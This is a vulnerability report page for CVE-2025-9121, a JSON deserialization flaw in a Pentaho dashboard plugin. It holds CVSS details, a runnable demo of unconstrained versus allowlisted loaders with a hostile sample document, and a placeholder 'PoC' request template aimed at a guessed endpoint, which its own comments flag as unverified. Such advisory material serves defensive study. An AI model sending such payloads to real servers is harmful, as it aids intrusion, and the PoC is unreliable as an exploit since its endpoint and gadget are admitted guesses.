Security Vulnerability Report
CVE-2025-9121 CVSS 8.8 HIGH

Published: 2025-12-15 23:15:58
Last Modified: 2026-04-15 00:35:42

Description

Pentaho Data Integration and Analytics Community Dashboard Editor plugin versions before 10.2.0.4, including 9.3.0.x and 8.3.x, deserialize untrusted JSON data without constraining the parser to approved classes and methods. In other words, a JSON document supplied by the caller can select which classes the parser instantiates and which methods it invokes on them, the CWE-502 (Deserialization of Untrusted Data) pattern; the High confidentiality, integrity and availability ratings are consistent with full compromise of the affected server.
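The pattern the description names, as an added example that is not Pentaho's code: the page does not say which JSON library the plugin uses or what its type-discriminator field is called, so the `@class` key, the two component classes and both loaders below are assumptions, written in Python rather than Java to keep the demonstration runnable. `load_unconstrained` resolves whatever type name the document carries, so a document naming `os.listdir` executes it; `load_constrained` accepts only an explicit allowlist of types and only the fields those types declare. The sample documents are constructed for the example.

```python
import importlib
import json
from dataclasses import dataclass, fields

# Stand-ins for the plugin's real dashboard model classes (names are assumptions).
@dataclass
class TextComponent:
    text: str
    width: int = 100

@dataclass
class ChartComponent:
    query: str
    chart_type: str = "bar"

def _qualified_name(cls) -> str:
    return f"{cls.__module__}.{cls.__name__}"

# --- Vulnerable pattern: the type field is resolved against every importable name.
def resolve_any(dotted: str):
    """Class.forName-style lookup: import the module, fetch the attribute."""
    module_name, _, attr = dotted.rpartition(".")
    return getattr(importlib.import_module(module_name), attr)

def load_unconstrained(doc: str):
    """Build whatever '@class' names, passing the remaining keys as arguments.

    Nothing limits the type, so the document decides what is called and how.
    """
    data = json.loads(doc)
    target = resolve_any(data.pop("@class"))
    return target(**data)

# --- Hardened pattern: exact-name allowlist of types, and only their declared fields.
TYPE_ALLOWLIST = {_qualified_name(c): c for c in (TextComponent, ChartComponent)}

def load_constrained(doc: str):
    """Refuse any type outside the allowlist and any field the type does not declare."""
    data = json.loads(doc)
    type_name = data.pop("@class", None)
    cls = TYPE_ALLOWLIST.get(type_name)
    if cls is None:
        raise ValueError(f"type not permitted: {type_name!r}")
    unknown = set(data) - {f.name for f in fields(cls)}
    if unknown:
        raise ValueError(f"fields not permitted for {cls.__name__}: {sorted(unknown)}")
    return cls(**data)

def rejects(loader, doc: str) -> bool:
    """True if the loader refuses the document instead of acting on it."""
    try:
        loader(doc)
    except ValueError:
        return True
    return False

# Constructed sample documents (not captured from any Pentaho system).
BENIGN_DOC = json.dumps({"@class": _qualified_name(TextComponent), "text": "hello"})
CHART_DOC = json.dumps({"@class": _qualified_name(ChartComponent),
                        "query": "select 1", "chart_type": "pie"})
# Hostile: names a function outside the model. os.listdir is used because it is
# harmless to run here; the same path reaches subprocess.Popen and friends.
HOSTILE_DOC = json.dumps({"@class": "os.listdir", "path": "/"})
# Hostile: allowed type, but smuggles a key the model never declared (assumed name).
SMUGGLED_DOC = json.dumps({"@class": _qualified_name(TextComponent),
                           "text": "x", "on_load": "..."})

if __name__ == "__main__":
    print(load_unconstrained(BENIGN_DOC))
    print("unconstrained loader ran os.listdir:", load_unconstrained(HOSTILE_DOC)[:3])
    print(load_constrained(BENIGN_DOC))
    print("constrained loader rejected hostile doc:", rejects(load_constrained, HOSTILE_DOC))
    print("constrained loader rejected smuggled field:", rejects(load_constrained, SMUGGLED_DOC))
```

Two design points carry over regardless of language: key the allowlist on exact type names rather than package prefixes, and fail closed on unknown fields so a document cannot reach setters or methods the model was never meant to expose.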

CVSS Details

CVSS Score: 8.8 (exploitability subscore 2.8, impact subscore 5.9)
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Metric source: vendor-supplied (secondary) metric; the NVD record status is "Deferred", so no NVD-analysed primary score is present.

Reading the vector: reachable over the network with low attack complexity, requires a low-privileged (authenticated) account, needs no user interaction, and yields high confidentiality, integrity and availability impact within the same security scope. An authenticated but otherwise unprivileged user is therefore sufficient to trigger it.

Configurations (Affected Products)

No CPE configuration data has been published for this CVE; the affected versions below are taken from the description.

Pentaho Community Dashboard Editor plugin < 10.2.0.4 (fixed in 10.2.0.4)
Pentaho Community Dashboard Editor plugin 9.3.0.x
Pentaho Community Dashboard Editor plugin 8.3.x

Whether fixed builds exist for the 9.3.0.x and 8.3.x branches is not stated on this page; check the vendor advisory before treating an upgrade within those branches as a fix.

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# CVE-2025-9121 PoC - Unsafe Deserialization in Pentaho Dashboard Editor
# This PoC demonstrates how an attacker could exploit the deserialization vulnerability
# by sending a malicious serialized payload.
#
# Caveat: the endpoint path, the request fields and the gadget class below are
# placeholders. None of them is stated in the vendor advisory or the CVE text,
# which describes a JSON parser that accepts unapproved classes and methods,
# not Java native serialization (the setting in which ysoserial gadgets such as
# AbstractTranslet/TemplatesImpl apply). Treat this as a request template only.
# The CVSS vector also requires low privileges (PR:L), so a real request would
# need a valid session; none is set here.
TARGET_URL = "http://target-server:8080/pentaho/plugin/dashboard-editor/api/deserialize"

# Example malicious serialized object (gadget chain payload).
# In a real attack this would be a ysoserial-style payload.
MALICIOUS_PAYLOAD = {
    "action": "deserialize",
    "data": "base64_encoded_serialized_object_here",
    "classType": "com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet",
}


def exploit(target_url, payload):
    """Send the deserialization payload to the (assumed) vulnerable endpoint."""
    headers = {
        "Content-Type": "application/json",
        "Accept": "application/json",
    }
    try:
        response = requests.post(target_url, json=payload, headers=headers, timeout=30)
        print(f"Status Code: {response.status_code}")
        print(f"Response: {response.text}")
        return response
    except requests.exceptions.RequestException as e:
        print(f"Request failed: {e}")
        return None


if __name__ == "__main__":
    print("CVE-2025-9121 PoC - Pentaho Unsafe Deserialization")
    print("Target:", TARGET_URL)
    exploit(TARGET_URL, MALICIOUS_PAYLOAD)

References

https://support.pentaho.com/hc/en-us/articles/41832536185613--Resolved-Hitachi-Vantara-Pentaho-Business-Analytics-Server-Deserialization-of-Untrusted-Data-Versions-before-10-2-0-4-Impacted-CVE-2025-9121 (vendor advisory)
Raw JSON Data

(The literal "[email protected]" values below are a rendering artifact of the source page; the original identifier strings are not recoverable from it.)

JSON
{
  "cve": {
    "id": "CVE-2025-9121",
    "sourceIdentifier": "[email protected]",
    "published": "2025-12-15T23:15:57.590",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Pentaho Data Integration and Analytics Community Dashboard Editor plugin versions before 10.2.0.4, including 9.3.0.x and 8.3.x, deserialize untrusted JSON data without constraining the parser to approved classes and methods."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "baseScore": 8.8,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 5.9
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-502"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://support.pentaho.com/hc/en-us/articles/41832536185613--Resolved-Hitachi-Vantara-Pentaho-Business-Analytics-Server-Deserialization-of-Untrusted-Data-Versions-before-10-2-0-4-Impacted-CVE-2025-9121",
        "source": "[email protected]"
      }
    ]
  }
}